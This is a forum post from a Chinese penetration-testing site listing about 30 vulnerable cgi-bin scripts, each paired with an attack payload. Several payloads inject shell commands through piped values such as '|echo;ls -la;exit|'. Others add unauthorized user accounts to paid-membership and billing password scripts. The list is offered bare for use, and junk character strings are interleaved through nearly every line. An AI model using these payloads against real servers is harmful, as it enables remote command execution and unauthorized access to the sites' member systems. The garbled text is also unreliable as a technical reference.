中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞+使用方法 [打印本页]

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞+使用方法
==============================
6 Y: d3 m: e4 O
% v- b! f4 U( \# ]# C/smspass.pl5 Q- t- K  U# L, H* j9 |
username=username&password=password
: K" H0 B/ P, A5 D, c! v0 X2 M9 n2 R- L+ c$ T2 {' O5 h
/index.cgi% t. S# D6 ~1 _; \: ~& f  z
wei=ren&gen=command
9 e! `. m. w: s4 D  R5 Q& b, f0 `
/passmaster.cgi
9 H8 X4 k" h! }3 LAction=Add&Username=Username&Password=Password
& c' x4 D! @1 ^0 \9 d) o" r9 u1 W* N
# j( N' {: s4 Y5 d) B/accountcreate.cgi
5 W! r& E6 Z5 h& @" l# o/ vusername=username&password=password&ref1=|echo;ls|
3 W, b; K  Z3 v" z, ]! \( w% y% N. D
( {- M& q1 N4 t9 z5 `6 M/ C$ L/form.cgi
8 A8 g+ W+ ^: o. ?) ^, Rname=xxxx&email=email&subject=xxxx&response=|echo;ls|) O" F% m& L( _% w$ d8 g
8 S0 N0 O& B. k% J* d$ {, Y- M: v
/addusr.pl* L  R4 [7 z% R5 Z; Z
/cgi-bin/EuroDebit/addusr.pl
# L- h7 p9 N! d# k. ^user=username&pass=Password&confirm=Password
3 q: b5 c+ ^7 S0 k- m. N1 E9 F* q6 m- g/ b. }
/ccbill-local.asp% u+ O' `3 \, I0 g4 z) k
post_values=username:password
5 n) K% d- M! |3 n
8 b8 U% Y+ m" b* j% x4 ]/count.cgi, h+ _: r; G( l! M; l" d6 X3 r
pinfile=|echo;ls -la;exit|, B6 h1 C' N: F: }! G

. E7 W. M2 X8 V+ ^, \/recon.cgi* ^/ k. x- r. h
/recon.cgi?search  H. y( b1 |- O) j/ y; x
searchoption=1&searchfor=|echo;ls -al;exit|8 T1 n( n4 d& X+ S
0 ~3 o4 D* }2 \
/verotelrum.pl7 i4 }$ H6 D1 _
vercode=username:password:dseegsow:add:amount<&30>
9 y2 ~0 G! T$ T7 k$ r! Y6 _. K
5 i. t' w  |* |6 A/af.cgi
" K( G( P$ V' i! h2 Z% d+ n* `_browser_out=|echo;ls -la;exit;|& z" t4 V$ t  s: V% ]! u! D
, o3 Z$ J) N, P/ {0 }
/modify.cgi
( y/ {$ r, Z7 h. x) Husername=username&password=password&expire=303 T+ G! T( }9 A5 Z6 N" x1 Z. h& h8 s) k
: D4 U* O! e+ z7 q; j* {2 q
/openjournal.cgi
; [+ w6 K! f- l% N+ Qedit=1&ct=2&go=|echo;ls -al;exit|( ]. K* a1 v/ p; n6 P

. c) c! }" `3 e6 d1 Y* C/gx9passwd.cgi
9 z. n$ Q5 W  o3 z" g: b6 K* vcmd=ADD&user=username&pass=password
' V5 o) c$ |, A# n0 d8 H; {! u7 O% D. A% ^: m  A& i
/probecontrol.cgi
0 F0 A3 N2 }# T3 J  ^command=enable&username=username&password=password
6 ]2 E" O3 R0 C) Z' s
2 H9 m6 J4 V/ |* _3 s/recon.cgi6 X  S% L1 u: X: F3 Q
searchoption=3&searchfor=echo;ls -la;exit
2 L: f1 k) a% S5 |" t- N/ _5 g, C6 f/ T. R
/htadd.pl
* u6 k& O# [+ S0 F# X8 u8 e) m9 V+ Gconfigfile=|echo; ls -alt; exit
% F7 s) g# f9 Q, H/ o9 C  J/ G, b1 \, J/ z; f" X5 s
/gx9passwd.cgi
* B- F8 V$ _  [9 A! j- ~  vcmd=ADD&user=username&pass=password" p2 n5 j( T& N3 j$ y- V9 H
. v& ]  T6 t, r, c  r" }- B! s: c: ]
/ibill*.pl
/ E( a/ |6 F! E3 W7 ^reqtype=add&authpwd=authpwd&username=username&password=password
& L4 ^7 D; U" o. c0 H' u; C+ v1 D  G0 }# w: g9 e  q7 \
/cpay.cgi
! U  y& D/ @/ |  scommand=add_member&username=username(EMAIL)&password=password(DES)
6 g! Y9 Q: Y4 O8 E
. J' c. r; T9 W1 i4 v2 z/globill_ut.cgi* d! W4 K; ]! e
do=add&username=username&password=password&wpassword=password
! X% E1 @: t6 u8 c! [( d: l. N1 A1 n
/usercontrol.cgi! B6 V# J7 q3 l6 L6 H
command=enable&username=USER&password=PASS
: V1 ]$ D  z- S
1 k1 s( [9 A; A6 ]1 \! T/globoSALErum.cgi/ P/ t: Z0 b5 o
action=ADD&seccode=seccode&login=username&password=password1 h% ]1 j5 P" x' I

+ g( D. U* [4 g/ Q7 M" g* l$ q) E/addusr.pl
8 ^: ]8 Z; V& f* l; ~; m  a. \% F: euser=USER&pass=PASS&confirm=PASS
* u' y9 N/ S$ c+ \. n2 V$ V+ B; S7 d# N% K% s1 j; ]; @+ {
/pincount.cgi
. F( h+ f9 q% W4 l3 O3 c7 p; f3 O( I; q/cgi-bin/mastergate/pincount.cgi9 H+ J/ P! b7 U7 i% c  r- ^- ~& V* w- Z
pinfile=|echo;pwd;exit|
9 E5 c2 Z( `* f/ K2 S2 ?* Y! K" q0 U5 [  ^/ p8 }
/accountcreate.cgi, x3 V8 J% H* E4 W0 y. j+ K7 g1 P
/cgi-bin/gateway/accountcreate.cgi
/ r/ q5 |' i1 @2 }; W& f6 }0 n. Gusername=username&password=password&password2=password&ref1=|echo;ls -al;exit# x+ p, p; L+ ~5 [' a# k) H

+ x/ h& h# z' ?# \2 Q8 K/af.cgi
# \5 ~# X0 Y2 l8 z/env.cgi
$ Z4 A  T+ A2 ^( J6 eADD+;echo;pwd;exit
- e# E" e" o& m9 v2 b6 z; \0 m" f* a
. b, M% |- ?; y+ X8 o/count.cgi8 x0 y4 G5 E* p
pinfile=|echo;pwd;exit|
# T' N& d9 k9 G7 z$ S
0 G# b: p$ m; p5 D/recon.cgi0 f9 |# J$ ?+ U5 M
searchoption=1&searchfor=|echo;ls%20-al;exit|
& o& h( @2 J& w/ n' |8 {# p0 s; B0 M) p1 y( M5 q1 w
/add.cgi* l. `7 H, H/ _7 k! Z. |( g
username=username&password=password&expire=30
. P1 }. q/ Z+ B: d2 W1 g3 Y& y8 \, a7 ^% Y3 p9 V) m
==============================
+ j+ {1 f3 _* J. w, `




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2